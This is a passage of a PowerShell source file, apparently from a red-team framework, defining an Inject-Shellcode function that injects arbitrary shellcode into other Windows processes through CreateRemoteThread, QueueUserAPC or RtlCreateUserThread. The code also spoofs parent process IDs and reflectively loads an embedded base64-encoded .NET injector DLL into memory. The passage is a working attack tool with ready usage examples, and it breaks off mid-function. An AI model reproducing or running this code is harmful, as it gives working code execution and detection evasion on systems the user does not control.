296 lines
37 KiB
PowerShell
296 lines
37 KiB
PowerShell
function Inject-Shellcode ([switch]$x86, [switch]$x64, $ParentID, [switch]$RTLCreateUserThread, [switch]$QueueUserAPC,[switch]$Force, [switch]$Suspended, [Parameter(Mandatory=$true)]$Shellcode, $ProcID, $ProcPath, $ProcessName, $ProcName)
|
|
{
|
|
<#
|
|
.SYNOPSIS
|
|
Inject-Shellcode using many different methods
|
|
Author: @benpturner
|
|
|
|
Methods:
|
|
|
|
+ QueueUserAPC
|
|
+ CreateRemoteThread
|
|
+ RTLCreateUserThread
|
|
|
|
.DESCRIPTION
|
|
Injects shellcode into x86 or x64 bit processes. Tested on Windowns 7 32 bit, Windows 7 64 bit and Windows 10 64bit.
|
|
|
|
.EXAMPLE
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502
|
|
|
|
.EXAMPLE
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> OpenThread -> QueueUserAPC -> ResumeThread
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -QueueUserAPC
|
|
|
|
.EXAMPLE
|
|
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> RTLCreateUserThread
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -RTLCreateUserThread
|
|
|
|
.EXAMPLE
|
|
OpenProcess(CUSTOM PID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634
|
|
|
|
.EXAMPLE
|
|
CreateProcess(CUSTOM ProcPath) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessPath C:\Windows\System32\notepad.exe
|
|
|
|
.EXAMPLE
|
|
OpenProcess(CUSTOM ProcessName) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
|
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessName notepad.exe
|
|
|
|
.EXAMPLE
|
|
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X64 -> x86
|
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x86
|
|
|
|
.EXAMPLE
|
|
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X86 -> x64
|
|
|
|
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x64
|
|
|
|
#>
|
|
|
|
if($ProcName){
|
|
$ProcessName = $ProcName
|
|
}
|
|
if($ProcPath){
|
|
$ProcessPath = $ProcPath
|
|
} else {
|
|
$ProcessPath = "C:\Windows\system32\netsh.exe"
|
|
}
|
|
$p = "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agBjAXMAagCDAXMAagCjAXMAagADAM4AGQDOACkAzgAzAM4AfQDOABoAWwBeAAEGAQAjBg4GAAEDAAwIAQBAAQUAhwMBAEABBwAJCQEAQAEJAOsIAQBAAQsACwMBAAABEQBuAAEAAAETAGsJAQAAARUAXAkBAAABFwCbAgEAAAEZAJEJAQAAARsAgwkBAAABHQAjCAEAAAEfAC8IAQAAASEACwMBAAABIwC2AgEAAAElAIACAQAAAScAjgIBAAYBKQD7AgEAQwErAEEIAgAAAi0AfAkDAAABLwDBAgQAQAExAAwIAQAEgAAAAQAAAAAAAAAAAAAAAACICAAAAgAAAAAAAAAAAAAAYQApAgAAAAACAAAAAAAAAAAAAABhADMGAAAAAAcABQAIAAUACQAFAAoABQALAAYADAAGAA0ABgAAAAAAAGtlcm5lbDMyAFRIUkVBRF9TRVRfQ09OVEVYVDIAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAVEhSRUFEX1NFVF9DT05URVhUMwBUSFJFQURfU0VUX0NPTlRFWFQ0ADxNb2R1bGU+AHBmbkFQQwBRdWV1ZVVzZXJBUEMARVhFQ1VURV9SRUFEAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBFWEVDVVRFX1JFQURXUklURQBFWEVDVVRFAE1FTV9SRVNFUlZFAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFNFVF9USFJFQURfVE9LRU4AUFJPQ0VTU19JTkZPUk1BVElPTgBTRVRfSU5GT1JNQVRJT04AUVVFUllfSU5GT1JNQVRJT04ARElSRUNUX0lNUEVSU09OQVRJT04AVE9QX0RPV04AU1RBUlRVUElORk8ATEFSR0VfUEFHRVMAU0VDVVJJVFlfQVRUUklCVVRFUwBOT0FDQ0VTUwBUSFJFQURfQUxMX0FDQ0VTUwBQUk9DRVNTX0FMTF9BQ0NFU1MAUkVTRVQATUVNX0NPTU1JVABHRVRfQ09OVEVYVABUSFJFQURfU0VUX0NPTlRFWFQAU1RBUlRVUElORk9FWABkd1gAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAZHdZAHZhbHVlX18AZHdEYXRhAGNiAG1zY29ybGliAHNyYwBscFRocmVhZElkAGR3VGhyZWFkSWQAcGFyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAENsaWVudElkAEdldFByb2Nlc3NCeUlkAFN1c3BlbmRUaHJlYWQAUmVzdW1lVGhyZWFkAENyZWF0ZVJlbW90ZVRocmVhZABoVGhyZWFkAE9wZW5UaHJlYWQAUnRsQ3JlYXRlVXNlclRocmVhZABDcmVhdGVTdXNwZW5kZWQAbHBSZXNlcnZlZABnZXRfSGFuZGxlAEdldE1vZHVsZUhhbmRsZQBDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGhNb2R1bGUAcHJvY05hbWUAbHBNb2R1bGVOYW1lAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBkd1hTaXplAGR3WVNpemUAZ2V0X1NpemUAY2JTaXplAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAGxwUmV0dXJuU2l6ZQBscFNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBuTGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwASW5qZWN0LmRsbABtc3ZjcnQuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGxwQnVmZmVyAFBQSURTcG9vZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAV3JpdGVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAFplcm9CaXRzAGhPYmplY3QASW5qZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAbHBFbnZpcm9ubWVudABkd0F0dHJpYnV0ZUNvdW50AGNvdW50AGRlc3QARGVsZXRlUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QASW5pdGlhbGl6ZVByb2NUaHJlYWRBdHRyaWJ1dGVMaXN0AGxwQXR0cmlidXRlTGlzdABoU3RkSW5wdXQAaFN0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"
|
|
$dl = [System.Convert]::FromBase64String($p)
|
|
$a = [System.Reflection.Assembly]::Load($dl)
|
|
$o = New-Object Inject
|
|
|
|
echo ""
|
|
echo "[+] Inject-Shellcode"
|
|
echo ""
|
|
|
|
if ($x86.IsPresent -and (!$procpath)) {
|
|
if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
|
|
$ProcessPath = "C:\Windows\System32\netsh.exe"
|
|
} else {
|
|
$ProcessPath = "C:\Windows\Syswow64\netsh.exe"
|
|
}
|
|
}
|
|
|
|
if ($Suspended.IsPresent) {
|
|
$SuspendedState = $true
|
|
} else {
|
|
$SuspendedState = $false
|
|
}
|
|
|
|
if ($ProcessName) {
|
|
|
|
$Process = [System.Diagnostics.Process]::GetProcessesByName($ProcessName)
|
|
|
|
} elseif ($ProcID){
|
|
echo "Using ProcID"
|
|
$Process = [System.Diagnostics.Process]::GetProcessById($ProcID)
|
|
$injectpid = $ProcID
|
|
|
|
} else {
|
|
|
|
if (($SuspendedState) -and ($ParentID)) {
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $true)
|
|
echo "[+] Parent Spoofing $ParentID & New Suspended Process: $ProcessPath"
|
|
$injectpid = $Success.dwProcessId
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
$injectpidhThread = $Success.hThread
|
|
|
|
} elseif ((!$SuspendedState) -and ($ParentID)) {
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $false)
|
|
echo "[+] Parent Spoofing $ParentID & New Process: $ProcessPath"
|
|
$injectpid = $Success.dwProcessId
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
$injectpidhThread = $Success.hThread
|
|
|
|
} elseif (($SuspendedState) -and (!$ParentID)) {
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $true)
|
|
echo "[+] New Suspended Process: $ProcessPath"
|
|
$injectpid = $Success.dwProcessId
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
$injectpidhThread = $Success.hThread
|
|
|
|
} else {
|
|
|
|
$Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $false)
|
|
echo "[+] New Process: $ProcessPath"
|
|
$injectpid = $Success.dwProcessId
|
|
$injectpiddwThreadID = $Success.dwThreadID
|
|
$injectpidhThread = $Success.hThread
|
|
|
|
}
|
|
|
|
}
|
|
|
|
$ProcessIDVal = $injectpid
|
|
$ProcessX86 = IsProcess-x86 $ProcessIDVal
|
|
$Proceed = $false
|
|
$64to32 = $false
|
|
|
|
if (($x86.IsPresent) -and ($ProcessX86)) {
|
|
echo "[+] Running against x86 process with ID: $ProcessIDVal"
|
|
$Proceed = $true
|
|
} elseif (($env:PROCESSOR_ARCHITECTURE -eq "x86") -and ($ProcessX86)) {
|
|
echo "[+] Running against x86 process with ID: $ProcessIDVal"
|
|
$Proceed = $true
|
|
} elseif ($ProcessX86) {
|
|
echo "[-] x86 process identified, use -x86 or this could crash the process"
|
|
echo "If you believe this is wrong use -Force to try injection anyway - use at own risk"
|
|
$Proceed = $false
|
|
} else {
|
|
